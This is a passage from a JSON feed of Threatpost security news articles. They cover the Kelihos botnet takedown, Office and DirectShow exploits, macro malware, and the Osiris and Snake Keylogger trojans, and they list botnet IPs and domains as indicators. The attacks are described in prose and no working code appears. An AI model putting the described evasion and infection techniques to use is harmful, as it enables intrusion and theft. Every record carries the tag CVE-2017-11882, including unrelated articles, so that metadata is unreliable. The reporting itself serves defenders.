different kinds of nodes: controllers, routers and workers. Controllers are machines presumably operated by the gang behind the botnet. They distribute commands to the bots and supervise the peer-to-peer network\u2019s dynamic structure. Routers are infected machines with public IP addresses. They run the bot in router mode, host proxy services, participate in a fast-flux collective, and so on. Finally, workers are infected machines that do not run in router mode, simply put. They are used for sending out spam, collecting email addresses, sniffing user credentials from the network stream, etc. A sketch of the layered architecture is shown below with a top tier of four controllers and worker nodes displayed in green.\n\n\n\n_Figure 1: Architecture of the Hlux botnet_\n\n**Worker Nodes**\n\nMany computers that can be infected with malware do not have a direct connection to the Internet. They are hidden behind gateways, proxies or devices that perform network address translation. Consequently, these machines cannot be accessed from the outside unless special technical measures are taken. This is a problem for bots that organize infected machines in peer-to-peer networks as that requires hosting services that other computers can connect to. On the other hand, these machines provide a lot of computing power and network bandwidth. A machine that runs the Hlux bot would check if it can be reached from the outside and if not, put itself in the worker mode of operation. Workers maintain a list of peers (other infected machines with public IP addresses) and request jobs from them. A job contains things like instructions to send out spam or to participate in denial-of-service attacks. It may also tell the bot to download an update and replace itself with the new version.\n\n**Router Nodes**\n\nRouters form some kind of backbone layer in the Hlux botnet. Each router maintains a peer list that contains information about other peers, just like worker nodes. At the same time, each router acts as an HTTP proxy that tunnels incoming connections to one of the Controllers. Routers may also execute jobs, but their main purpose is to provide the proxy layer in front of the controllers.\n\n**Controllers**\n\nThe controller nodes are the top visible layer of the botnet. Controllers host a nginx HTTP server and serve job messages. They do not take part in the peer-to-peer network and thus never show up in the peer lists. There are usually six of them, spread pairwise over different IP ranges in different countries. Each two IP addresses of a pair share an SSH RSA key, so it is likely that there is really only one box behind each address pair. From time to time some of the controllers are replaced with new ones. Right before the botnet was taken out, the list contained the following entries:\n\n193.105.134.189 \n193.105.134.190 \n195.88.191.55 \n195.88.191.57 \n89.46.251.158 \n89.46.251.160\n\n**The Peer-to-Peer Networks**\n\nEvery bot keeps up to 500 peer records in a local peer list. This list is stored in the Windows registry under HKEY_CURRENT_USERSoftwareGoogle together with other configuration details. When a bot starts on a freshly infected machine for the first time, it initializes its peer list with some hard-coded addresses contained in the executable. The latest bot version came with a total of 176 entries. The local peer list is updated with peer information received from other hosts. Whenever a bot connects to a router node, it sends up to 250 entries from its current peer list, and the remote peer send 250 of his entries back. By exchanging peer lists, the addresses of currently active router nodes are propagated throughout the botnet. A peer record stores the information shown in the following example:\n\nm_ip: 41.212.81.2 \nm_live_time: 22639 seconds \nm_last_active_time: 2011-09-08 11:24:26 GMT \nm_listening_port: 80 \nm_client_id: cbd47c00-f240-4c2b-9131-ceea5f4b7f67 \nThe peer-to-peer architecture implemented by Hlux has the advantage of being very resilient against takedown attempts. The dynamic structure allows for fast reactions if irregularities are observed. When a bot wants to request jobs, it never connects directly to a controller, no matter if it is running in worker or router mode. A job request is always sent through another router node. So, even if all controller nodes go off-line, the peer-to-peer layer remains alive and provides a means to announce and propagate a new set of controllers.\n\n**The Fast-Flux Service Network**\n\nThe Hlux botnet also serves several fast-flux domains that are announced in the domain name system with a TTL value of 0 in order to prevent caching. A query for one of the domains returns a single IP address that belongs to an infected machine. The fast-flux domains provide a fall-back channel that can be used by bots to regain access to the botnet if all peers in their local list are unreachable. Each bot version contains an individual hard-coded fall-back domain. Microsoft unregistered these domains and effectively decommissioned the fall-back channel. Here is the set of DNS names that were active before the takedown \u2013 in case you want to keep an eye on your DNS resolver. If you see machines asking for one of them, they are likely infected with Hlux and should be taken care of.\n\nhellohello123.com \nmagdali.com \nrestonal.com \neditial.com \ngratima.com \npartric.com \nwargalo.com \nwormetal.com \nbevvyky.com \nearplat.com \nmetapli.com\n\nThe botnet further used hundreds of sub-domains of ce.ms and cz.cc that can be registered without a fee. But these were only used to distribute updates and not as a backup link to the botnet.\n\n**Counteractions**\n\nA bot that can join the peer-to-peer network won\u2019t ever resolve any of the fall-back domains \u2013 it does not have to. In fact, our botnet monitor has not logged a single attempt to access the backup channel during the seven months it was operated as at least one other peer has always been reachable.\n\nThe communication for bootstrapping and receiving commands uses a special custom protocol that implements a structured message format, encryption, compression and serialization. The bot code includes a protocol dispatcher to route incoming messages (bootstrap messages, jobs, SOCKS communication) to the appropriate functions while serving everything on a single port. We reverse engineered this protocol and created some tools for decoding botnet traffic. Being able to track bootstrapping and job messages for a intentionally infected machine provided a view of what was happening with the botnet, when updates were distributed, what architectural changes were undertaken and also to some extend how many infected machines participate in the botnet.\n\n\n\n_Figure 2: Hits on the sinkhole per minute_\n\nThis Monday, we started to propagate a special peer address. Very soon, this address became the most prevalent one in the botnet, resulting in the bots talking to our machine, and to our machine only. Experts call such an action sinkholing \u2013 bots communicate with a sinkhole instead of its real controllers. At the same time, we distributed a specially crafted list of job servers to replace the original one with the addresses mentioned before and prevent the bots from requesting commands. From this point on, the botnet could not be commanded anymore. And since we have the bots communicating with our machine now, we can do some data mining and track infections per country, for example. So far, we have counted 49,007 different IP addresses. Kaspersky works with Internet service providers to inform the network owners about the infections.\n\n\n\n_Figure 3: Sinkholed IP addresses per country_\n\n**What now?**\n\nThe main question is now: what is next? We obviously cannot sinkhole Hlux forever. The current measures are a temporary solution, but they do not ultimately solve the problem, because the only real solution would be a cleanup of the infected machines. We expect that the number of machines hitting our sinkhole will slowly lower over time as computers get cleaned and reinstalled. Microsoft said their Malware Protection Center has added the bot to their Malicious Software Removal Tool. Given the spread of their tool this should have an immediate impact on infection numbers. However, in the last 16 hours we have still observed 22,693 unique IP addresses. We hope that this number is going to be much lower soon.\n\nInterestingly, there is one other theoretical option to ultimately get rid of Hlux: we know how the bot\u2019s update process works. We could use this knowledge and issue our own update that removes the infections and terminates itself. However, this would be illegal in most countries and will thus remain theory.\n\n_Tillmann Werner is a senior malware analyst at Kaspersky Lab._\n", "cvss3": {}, "published": "2011-09-29T15:10:41", "type": "threatpost", "title": "The Inside Story of the Kelihos Botnet Takedown", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-01T20:51:46", "id": "THREATPOST:E77302403616F2E9A6C7DA2AD2B1F880", "href": "https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/75703/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:02", "description": "[](<https://threatpost.com/microsoft-warns-dangerous-directshow-flaw-attacks-052809/>)Microsoft today warned that hackers are using rigged QuickTime media files to exploit an unpatched vulnerability in DirectShow, the APIs used by Windows programs for multimedia support.\n\nThe company has activated its security response process to deal with the zero-day attacks has issued a pre-patch advisory with workarounds and a one-click \u201cfix it\u201d feature to enable the mitigations.\n\nFrom the [advisory](<http://www.microsoft.com/technet/security/advisory/971778.mspx>):\n\nMicrosoft is aware of limited, active attacks that use this exploit code. While our investigation is ongoing, our investigation so far has shown that Windows 2000 Service Pack 4, Windows XP, and Windows Server 2003 are vulnerable; all versions of Windows Vista and Windows Server 2008 are not vulnerable.\n\nAn entry on the MSRC blog provides [more details](<http://blogs.technet.com/msrc/archive/2009/05/28/microsoft-security-advisory-971778-vulnerability-in-microsoft-directshow-released.aspx>):\n\nThe vulnerability is in the QuickTime parser in Microsoft DirectShow. An attacker would try and exploit the vulnerability by crafting a specially formed video file and then posting it on a website or sending it as an attachment in e-mail. While this isn\u2019t a browser vulnerability, because the vulnerability is in DirectShow, a browser-based vector is potentially accessible through any browser using media plug-ins that use DirectShow. Also, we\u2019ve verified that it is possible to direct calls to DirectShow specifically, even if Apple\u2019s QuickTime (which is not vulnerable) is installed.\n\nInterestingly, the vulnerable component was removed from Windows Vista and later operating systems but is still available for use in the Microsoft Windows 2000, Windows XP, and Windows Server 2003 operating systems.\n\nVulnerable Windows users should immediately consider disabling QuickTime parsing to thwart attackers. This [KB article provides fix-it button](<http://support.microsoft.com/kb/971778>) that automatically enables the workaround.\n\nIt also provides detailed instructions on using a managed script deployment for Windows shops.\n\nAlso see the [Security Research and Defense blog](<http://blogs.technet.com/srd/archive/2009/05/28/new-vulnerability-in-quicktime-parsing.aspx>) for more information.\n", "cvss3": {}, "published": "2009-05-28T21:16:23", "type": "threatpost", "title": "Microsoft warns of dangerous DirectShow flaw, attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:08", "id": "THREATPOST:88A5449B2DE22E7A3AD1C820BEDE1109", "href": "https://threatpost.com/microsoft-warns-dangerous-directshow-flaw-attacks-052809/72744/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:02", "description": "A few days after MIcrosoft released a patch to fix a vulnerability in ASP.NET that could enable a denial-of-service attack, someone has released exploit code for the vulnerability. \n\nThe proof-of-concept [exploit code](<https://github.com/HybrisDisaster/aspHashDoS>) was posted to the Full Disclosure mailing list and is available for download from GitHUb. Posted by a user named HybrisDisaster, the code is designed to exploit a recently discovered vulnerability in ASP.NET that\u2019s related to the way that the software handles certain HTTP post requests. The vulnerability was first disclosed in late December at the Chaos Communications Congress in Germany.\n\nThe problem isn\u2019t actually specific to ASP.NET, but affects a variety of languages and applications. Microsoft shipped an emergency patch for the flaw on Dec. 29, recommending that users install it as quickly as possible.\n\n\u201cThis vulnerability could allow an anonymous attacker to efficiently consume all CPU resources on a web server, or even on a cluster of web servers. For ASP.NET in particular, a single specially crafted ~100kb HTTP request can consume 100% of one CPU core for between 90 \u2013 110 seconds. An attacker could potentially repeatedly issue such requests, causing performance to degrade significantly enough to cause a denial of service condition for even multi-core servers or clusters of servers,\u201d [Microsoft\u2019s Suha Can and Jonathan Ness said](<https://blogs.technet.com/b/srd/archive/2011/12/27/more-information-about-the-december-2011-asp-net-vulnerability.aspx?Redirected=true>) in a blog post about the problem.\n\nThe base cause of the problem is that when ASP.NET comes across a form submission with some specific characteristics, it will need to perform a huge amount of computations that could consume all of the server\u2019s rresources.\n", "cvss3": {}, "published": "2012-01-09T16:00:19", "type": "threatpost", "title": "Exploit Code Released for ASP.NET Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:02", "id": "THREATPOST:D58796CB8261B361ADF389131F955AE3", "href": "https://threatpost.com/exploit-code-released-aspnet-flaw-010912/76073/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:18", "description": "Microsoft is warning of an innovative new technique attackers are using to sneak macro malware past virus detection engines and add to the already huge uptick in reported macro attacks.\n\nAccording to researchers at Microsoft\u2019s Malware Protection Center, they stumbled upon the macro technique in a file containing VBA project scripts with a sample of well-known malicious macro malware called [TrojanDownloader:O97M/Donoff](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=TrojanDownloader:O97M/Donoff>). It wasn\u2019t the malware that piqued Microsoft\u2019s interest, it was the attacker\u2019s never-before-seen obfuscation technique.\n\nIt wasn\u2019t immediately obvious that the macro file was actually malicious, wrote Marianne Mallen and Wei Li, both antivirus researchers at the Microsoft Malware Protection Center, who co-authored [a blog post](<https://blogs.technet.microsoft.com/mmpc/2016/05/17/malicious-macro-using-a-sneaky-new-trick/>) earlier this week on their discovery. \u201cIt [was] a Word file that contains seven VBA modules and a VBA user form with a few buttons (using the CommandButton elements),\u201d wrote both authors.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/05/06235606/macro-form.png>)\n\nThe VBA user form contains three buttons. One of the buttons contained the encrypted URL.\n\nThe researchers said at first the VBA modules looked legit. \u201cNo malicious code found there \u2026 However, after further investigation we noticed a strange string in the Caption field for CommandButton3 in the user form,\u201d the researchers wrote.\n\nAs it turned out the attackers were embedding the malware using a \u201csneaky new trick.\u201d Upon further inspection, Microsoft said the attacker stored commands inside the name of a macro button. When the macro was executed it was directed to decrypt the data string used to name the macro button. Contained in the data string were commands to visit a specific URL where the malware could be downloaded onto the targeted computer from.\n\n\u201cThe macro will connect to the URL (hxxp://clickcomunicacion.es/&lt;uniqueid&gt;) to download a payload which we detect as Ransom:Win32/Locky,\u201d Microsoft wrote.\n\n\u201cAfter the macro runs, it is instructed to find the button and extract the (button\u2019s) name. Next, takestake that string (or the button\u2019s name) and decrypt it. Then the URL downloads the executable,\u201d commented Ryan Olson, researcher at Palo Alto in an interview with Threatpost. Olson said he has never seen this technique before, but there is nothing remarkable about the macro. \u201cThe Microsoft find is yet another iteration of a macro that uses a slightly different technique to evade detection.\u201d He said the technique is slick, but par for the course in the whack-a-mole arms race to trick and detect macros.\n\nAccording to Palo Alto, macro attacks are on the rise. This year Palo Alto reports 1.2 million instances of the Bartallex family of malware delivered via malicious macro documents. That\u2019s up from last year with 100,000 instances of Bartallex family macro malware.\n\n\u201cWe suspect that macro-based attacks are experiencing a resurgence from the late 1990s. There are a whole new pool of victims that don\u2019t remember how dangerous macros were and are learning the hard way to never trust macros unless sent from a 100 percent reliable source,\u201d Olson said.\n", "cvss3": {}, "published": "2016-05-21T09:00:53", "type": "threatpost", "title": "Microsoft Warns of Sneaky New Macro Trick", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-05-23T15:32:11", "id": "THREATPOST:42FDB1238D348C4F4A1074DB3091E6F2", "href": "https://threatpost.com/microsoft-warns-of-sneaky-new-macro-trick/118227/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:13", "description": "Problems with [a security update issued this week by Microsoft](<https://threatpost.com/microsoft-patches-old-stuxnet-bug-freak-vulnerability/111565>) have surfaced on a number of technology forums.\n\nWindows users say [Microsoft Security Advisory 303929](<https://technet.microsoft.com/en-us/library/security/3033929.aspx>), which adds SHA-2 code-signing and verification support for Windows 7 client machines and Windows Server 2008 R2 boxes, is causing computers to enter into an infinite loop.\n\nA request for comment from Microsoft was not returned in time for publication. It is not clear whether or when Microsoft will pull the update back for repairs as it has with other [faulty](<https://threatpost.com/microsoft-yet-to-deliver-fix-for-faulty-patch-tuesday-update/107809>) [patches](<https://threatpost.com/microsoft-fixes-broken-security-patch-ms14-045/107953>).\n\n\u201cAfter installation the PC reboots, but during the boot up configuration of the patch it fails and Windows starts, reverting the configuration and reboots,\u201d said one poster on a Microsoft-sponsored [Windows forum](<http://answers.microsoft.com/en-us/windows/forum/windows_7-windows_update/kb3033929-fails-to-install-and-cause-a-minor/4c56d5d5-a66c-4865-8ccb-d36f7c314c33>). \u201cAnd then it starts all over again a couple of times until it eventually boot into Windows.\u201d\n\nNine others on that one forum posted a reply noting the same problem almost verbatim.\n\nTuesday\u2019s update notes that it supersedes another similar update from October and addressed issues that customers had with that installation, Microsoft said. Windows 8, 8.1, RT, RT 8.1, Windows Server 2012 and Windows Server 2012 R2 already have SHA-2 support built in. Windows Server 2003, Vista and Windows Server 2008 will not receive similar support, Microsoft said.\n\nThe SHA-1 algorithm has long been considered weak, obsolete and dangerous to deploy with [collision attacks against it considered practical by 2018](<threatpost.com/sha-1-hash-collision-could-be-within-reach-attackers-2018-100512/77088>). Microsoft, itself, formally recommended that [developers stop using SHA-1](<https://threatpost.com/microsoft-warns-customers-away-from-sha-1-and-rc4/102902>) two years ago, and deprecate other weak crypto such as RC4. By January, Microsoft developers will no longer be allowed to use SHA-1 in code signing or developer certs.\n\nBrowser makers such as Mozilla and Google have also shunned the use of SHA-1. Mozilla, last September, [formally asked Certificate Authorities and websites to upgrade certificates to SHA-256, SHA-384 or SHA-512](<https://threatpost.com/mozilla-latest-to-part-ways-with-sha-1/108495>), all exponentially stronger mathematically than SHA-1, and announced that SHA-1 should not be trusted after Jan. 1, 2017.\n\nGoogle, meanwhile, [phased out SHA-1 usage in its Chrome](<https://threatpost.com/google-sunsetting-weak-sha-1-crypto-algorithm/108145>) browser starting last November with Chrome 40. Since then, Chrome no longer fully trusts sites whose certificate chains trust SHA-1 and extend beyond Jan. 1, 2017. Sites with SHA-1 certificates extending beyond that date will be trusted, but Chrome will note that they have \u201cminor errors.\u201d Staring with Chrome 40, sites with certificate chains including SHA-1 which extend beyond Jan. 1, 2017 will be marked with a blank white sheet, the current visual display for \u201cneutral, lacking security.\u201d Chrome 41 will treat such sites as \u201caffirmatively insecure,\u201d a state indicated by a padlock with a red X on top of it and a red strike through the text that says HTTPS.\n", "cvss3": {}, "published": "2015-03-12T10:16:57", "type": "threatpost", "title": "Microsoft SHA-2 Advisory Causing 'Infinite Loop' Issues", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-03-12T14:16:57", "id": "THREATPOST:68D1078BB418B06D989E65C3972EDE28", "href": "https://threatpost.com/microsoft-sha-2-advisory-causing-infinite-loop-issues/111597/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:05:59", "description": "**[](<https://threatpost.com/katie-moussouris-microsoft-trustworthy-computing-and-evolution-security-community-031611/>)**\n\nDennis Fisher talks with Microsoft\u2019s Katie Moussouris about the way that the Trustworthy Computing effort at Microsoft has changed, how the security community has evolved since she got involved in the 1990s and the challenges\u2013and fun\u2013of being a woman in security.\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n\nSubscribe to the Digital Underground podcast on [](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n", "cvss3": {}, "published": "2011-03-16T15:12:29", "type": "threatpost", "title": "Katie Moussouris on Microsoft, Trustworthy Computing and the Evolution of the Security Community", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-24T18:59:56", "id": "THREATPOST:D6D859A31F73B00E9B6F642D4C89B344", "href": "https://threatpost.com/katie-moussouris-microsoft-trustworthy-computing-and-evolution-security-community-031611/75032/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-30T05:51:18", "description": "After staying dormant for few years, the Kronos banking trojan resurfaced in July in a form dubbed Osiris. A wider analysis of how the banking trojan is evolving shows innovative development on the part of its authors, with an eye to broader malware trends.\n\nOsiris [first appeared in July](<https://threatpost.com/kronos-banking-trojan-resurfaces-after-years-of-silence/134364/>) in three distinct campaigns targeting Germany, Japan and Poland over the summer. It was clear that it\u2019s based off of the [Kronos malware](<https://threatpost.com/new-kronos-banking-malware-advertised-on-russian-forums/107210/>) which led the financial crime pack for many quarters after it surfaced in 2014 (it is itself a descendant of the infamous [Zeus banking code](<https://threatpost.com/versatility-of-zeus-framework-encourages-criminal-innovation/106638/>)).\n\nWhile the behaviors exhibited by the newly spawned banking trojan are similar to many other prevalent banking malware (for instance, it implements Zeus-style G/P/L web-injects, a keylogger and a VNC server, according to Securonix researcher Oleg Kolesnikov), there are also significant differences.\n\nFor one, it uses encrypted Tor traffic for command-and-control (C2). \u201cThe malicious payload spawns multiple processes named \u2018tor.exe\u2019 and connects to multiple distinct host (Tor nodes) located in different countries,\u201d Kolesnikov said in [a post](<https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack>) Tuesday on Osiris.\n\nAlso, Osiris has upped the game on evasion efforts. As Kolesnikov explained in an interview with Threatpost, \u201cOne of the new aspects of Osiris that are particularly notable is a fairly innovative legitimate process impersonation technique.\u201d He added that this evasion technique involves a combination of a recently pioneered [process-doppelganging approach](<https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf>), combined with the more traditional [process-hollowing](<https://threatpost.com/mylobot-botnet-emerges-with-rare-level-of-complexity/132967/>) technique.\n\n\u201cThis can potentially make detection of the banking trojan\u2019s activity using purely endpoint tools more challenging compared to tools that are capable of looking at the behaviors of other entities besides endpoints\u2026[such as] network and user information,\u201d he said.\n\n**The Attack Pattern**\n\nThe primary infiltration vector that has so far been [seen in the wild](<https://research.checkpoint.com/osiris-enhanced-banking-trojan>) for Osiris is spam email. These contain specially crafted Microsoft Word documents/RTF attachments with macro/OLE content that cause malicious obfuscated VB stages to be dropped and executed. In many scenarios, the malware is distributed using exploit kits like RIG EK, the analysis showed.\n\nThe malicious document exploits a well-known buffer overflow vulnerability in Microsoft Office Equation Editor Component ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>)) which allows the attacker to perform arbitrary code-execution.\n\n\u201cThe vulnerability resides in the Equation Editor Component which, when used, runs as its own process (eqnedt32.exe),\u201d Kolesnikov explained. \u201cBecause of the way it was implemented, it doesn\u2019t support Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR). A malicious document exploits the vulnerability to execute a command to download the latest version of [Osiris].\u201d\n\nOsiris, like other banking trojans, is mainly aimed at stealing credentials and other sensitive data, from online banking accounts and so on. The primary method of collection is through a man-in-browser attack to web-inject malicious script into banking websites and grabbing form values.\n\n**A Thoroughly Modern Malware**\n\nNotably, Osiris\u2019 fundamental makeup positions it in the fore of malware trends, despite being based on old source code that\u2019s been knocking around for years.\n\n\u201cBased on the banking attacks we are seeing in the wild, there appears to be a growing trend towards a convergence of malicious features offered by many trojans,\u201d Kolesnikov told Threatpost. \u201cFor instance, it is quite common to see the same baseline set of features offered in many prevalent bank trojans, such as form-grabbing, sandbox and AV bypass, web injections, password recovery, keylogging and remote access.\u201d\n\nHe added that the latest version of Osiris also fits into a trend of malware adopting [a more modular architecture](<https://threatpost.com/bad-actors-sizing-up-systems-via-lightweight-recon-malware/137364/>) in general; this enables malicious actors to provide updates and plugins to implement various malicious behaviors after an initial infection.\n\nThis dovetails with \u201ca growing trend for more rapid malware prototyping and a decrease in the \u2018research-to-malware\u2019 time it for malicious threat actors to implement the latest attack and evasion techniques reported in the security community,\u201d he added.\n\nUnfortunately, Osiris is poised to become more widespread, given that its pricing on the Dark Web lowers the barrier-to-entry for bad actors.\n\n\u201cAnother aspect is that Osiris is relatively cheaper compared to Kronos, which was sold for $3,000 in 2014, compared to Osiris that is sold for $2,000 in 2018, making it potentially more accessible to more cybercriminals,\u201d Kolesnikov told us. \u201cAlso, Osiris authors offered an option of reselling the license for $1,000 (not offered for Kronos), which can potentially further increase the scale and impact of the malicious threat.\u201d\n", "cvss3": {}, "published": "2018-09-12T16:12:55", "type": "threatpost", "title": "Osiris Banking Trojan Displays Modern Malware Innovation", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-09-12T16:12:55", "id": "THREATPOST:43B03902EBB289EABEA3B61E32BF7B7B", "href": "https://threatpost.com/osiris-banking-trojan-displays-modern-malware-innovation/137393/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-23T13:53:38", "description": "While most malicious e-mail campaigns use Word documents to hide and spread malware, a recently discovered campaign uses a malicious PDF file and a 22-year-old Office bug to propagate the Snake Keylogger malware, researchers have found.\n\nThe campaign\u2014discovered by researchers at HP Wolf Security\u2014aims to dupe victims with an attached PDF file purporting to have information about a remittance payment, according to [a blog post](<https://threatresearch.ext.hp.com/pdf-malware-is-not-yet-dead/>) published Friday. Instead, it loads the info-stealing malware, using some tricky evasion tactics to avoid detection.\n\n\u201cThe reasons are clear: users are familiar with these file types, the applications used to open them are ubiquitous, and they are suited to social engineering lures,\u201d he wrote.\n\nStill, while the new campaign does use PDF in the file lure, it later employs Microsoft Word to deliver the ultimate payload\u2014the Snake Keylogger, researchers found. Snake Keylogger is a malware developed using .NET that first appeared in late 2020 and is aimed at stealing sensitive information from a victim\u2019s device, including saved credentials, the victim\u2019s keystrokes, screenshots of the victim\u2019s screen, and clipboard data, [according to Fortinet.](<https://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware>)\n\n## **\u2018Unusual\u2019 Campaign**\n\nThe HPW Wolf Security team noticed a new PDF-based threat campaign on March 23 with an \u201cunusual infection chain,\u201d involving not just a PDF but also \u201cseveral tricks to evade detection, such as embedding malicious files, loading remotely-hosted exploits and shellcode encryption,\u201d Schlapfer wrote.\n\nAttackers target victims with emails that include a PDF document named \u201cREMMITANCE INVOICE.pdf\u201d\u2014misspelling intended\u2013as attachment. If someone opens the file, Adobe Reader prompts the user to open a .docx file with a rather curious name, researchers found.\n\n\u201cThe attackers sneakily named the Word document \u201chas been verified. However PDF, Jpeg, xlsx, .docx\u201d to make it look as though the file name was part of the Adobe Reader prompt,\u201d according to the post.\n\nThe.docx file is stored as an EmbeddedFile object within the PDF, which opens Microsoft Word if clicked on, researchers found. If Protected View is disabled, Word downloads a Rich Text Format (.rtf) file from a web server, which then is run in the context of the open document.\n\nResearchers unzipped the contents of the .rtf\u2014which is an Office Open XML file\u2014finding a URL hidden in the \u201c_document.xml.rels__\u201d _file that is not a legitimate domain found in Office documents, they said.\n\n## **17-Year-Old Bug Exploited**\n\nConnecting to this URL leads to a redirect and then downloads an RTF document called \u201c_f_document_shp.do__c._ This document contained two \u201cnot well-formed\u201d OLE objects that revealed shellcode exploiting [CVE-2017-11882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-11882>), which researchers said is an \u201cover four-years-old\u201d remote code execution vulnerability (RCE) in Equation Editor.\n\nEquation Editor is app installed by default with the Office suite that\u2019s used to insert and edit complex equations as Object Linking and Embedding (OLE) items in Microsoft Word documents.\n\nIt turns out, however, that the bug that attackers leverage in the campaign is actually one that Microsoft patched more than four years ago\u2013[in 2017](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>), to be exact\u2014but actually had existed some 17 years before that, making it 22 years old now.\n\nAs the final act of the attack, researchers found shellcode stored in the \u201c_OLENativeStream__\u201d _structure at the end of one of the OLE objects they examined. The code eventually decrypts a ciphertext that turns out to be more shellcode, which is then executed after to lead to an executable called _fresh.exe_ that loads the Snake Keylogger, researchers found.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-23T12:07:56", "type": "threatpost", "title": "Snake Keylogger Spreads Through Malicious PDFs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2022-05-23T12:07:56", "id": "THREATPOST:384A1D8040B61120BE2BA529493B9871", "href": "https://threatpost.com/snake-keylogger-pdfs/179703/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:09:40", "description": "[](<https://threatpost.com/new-unpatched-flaw-surfaces-sql-server-090209/>)There is an unpatched flaw in Microsoft SQL Server that could enable an attacker to access users\u2019 passwords on the database server. The vulnerability is in SQL Server 2000, 2005 and 2008.\n\nThe SQL Server vulnerability was discovered last fall by database-security vendor Sentrigo, which then reported the problem to Microsoft. But the software giant did not consider the problem serious enough to warrant a patch, Sentrigo officials said, so the weakness has remained unpatched for nearly a year. Sentrigo has released a [free software tool](<http://www.sentrigo.com/passwords>) that will address the problem, though it does not patch the vulnerability.\n\nThe tool, called Passwordizer, erases the cleartext passwords from the database server.\n\nIn a statement, Microsoft officials said the company is not planning to patch the flaw and does not see it as a problem that requires a security update.\n\nThe flaw lies in the way that SQL Server handles user passwords. By looking at the process memory, an administrator can see other users\u2019 passwords in cleartext. However, in order to see the process memory dump, a user would have to have administrator rights already, a condition that limits the severity of the bug.\n\n\u201cDevelopers go to great lengths to ensure passwords are not even transmitted in clear text (for example at the time of login), let alone stored in a readable form. Users have come to expect that their personal passwords, are exactly that \u2013personal \u2013 and that not even administrators can see them. Exploiting this vulnerability, an administrator will be able to see the passwords of users and applications that have connected to SQL Server, all the way back to the last restart,\u201d said Slavik Markovich, CTO of Sentrigo. \u201cWe respectfully disagree with Microsoft\u2019s view that since it requires administrative privileges, the risk is mitigated. Even if you trust your admins, there are plenty of hackers capable of gaining escalated privileges, who could now easily access other systems across the network using these passwords.\u201d\n\nThe flaw can be exploited remotely in SQL Server 2000 and 2005, but in SQL Server 2008 Microsoft made a change to make it more difficult for administrators to access the memory, so an attacker would need local access to the machine in that case.\n", "cvss3": {}, "published": "2009-09-02T12:30:49", "type": "threatpost", "title": "New Unpatched Flaw Surfaces in SQL Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:44", "id": "THREATPOST:1FB92D9630590CC17FF00234FF9991FF", "href": "https://threatpost.com/new-unpatched-flaw-surfaces-sql-server-090209/73026/", "cvss": {"score": 9.3, "vector": 